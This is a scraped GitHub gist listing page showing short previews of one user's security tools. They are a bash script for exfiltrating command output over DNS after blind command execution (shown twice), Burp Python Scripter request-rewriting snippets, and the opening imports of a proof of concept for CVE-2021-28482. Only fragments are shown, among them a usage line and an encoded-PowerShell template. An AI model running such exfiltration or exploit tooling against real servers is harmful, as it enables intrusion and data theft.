Soroush Dalili irsdl
irsdl
/ dns_data_exfiltration.sh
Created
October 13, 2020 09:49
A bash script that automates the exfiltration of data over dns in case we have a blind command execution on a server where all outbound connections except DNS are blocked.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| : ' | |
| Usage: | |
| ./dns_data_exfiltration.sh "ls -lh" #the output of "ls -lh" will be exfiltrated over dns | |
| Todo: | |
| 1. add support for powershell | |
| something like the following should do the trick but haven't tested it: | |
| outer_cmd_template="powershell -enc %CMD_B64%" |
irsdl
/ dns_data_exfiltration.sh
Created
October 13, 2020 09:49
A bash script that automates the exfiltration of data over dns in case we have a blind command execution on a server where all outbound connections except DNS are blocked.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| : ' | |
| Usage: | |
| ./dns_data_exfiltration.sh "ls -lh" #the output of "ls -lh" will be exfiltrated over dns | |
| Todo: | |
| 1. add support for powershell | |
| something like the following should do the trick but haven't tested it: | |
| outer_cmd_template="powershell -enc %CMD_B64%" |
irsdl
/ pyscripter_snippets.py
Last active
January 5, 2024 05:04
— forked from lanmaster53/pyscripter-snippets.py
Burp Python Scripter scripts
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ***********************************************replacer_for_python_scripter | |
| import re,random | |
| print callbacks.getToolName(toolFlag) | |
| if(messageIsRequest): | |
| if (callbacks.getToolName(toolFlag) == "Proxy" or callbacks.getToolName(toolFlag) == "Intruder" or callbacks.getToolName(toolFlag) == "Repeater"): | |
| requestInfo = helpers.analyzeRequest(messageInfo) | |
| headers = requestInfo.getHeaders() | |
| msgBody = messageInfo.getRequest()[requestInfo.getBodyOffset():] | |
| msg = helpers.bytesToString(msgBody) |
irsdl
/ PoC_CVE-2021-28482.py
Created
September 7, 2021 21:15
— forked from testanull/PoC_CVE-2021-28482.py
PoC of CVE-2021-28482
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import time | |
| import sys | |
| from base64 import b64encode | |
| from requests_ntlm2 import HttpNtlmAuth | |
| from urllib3.exceptions import InsecureRequestWarning | |
| from urllib import quote_plus | |
| requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) |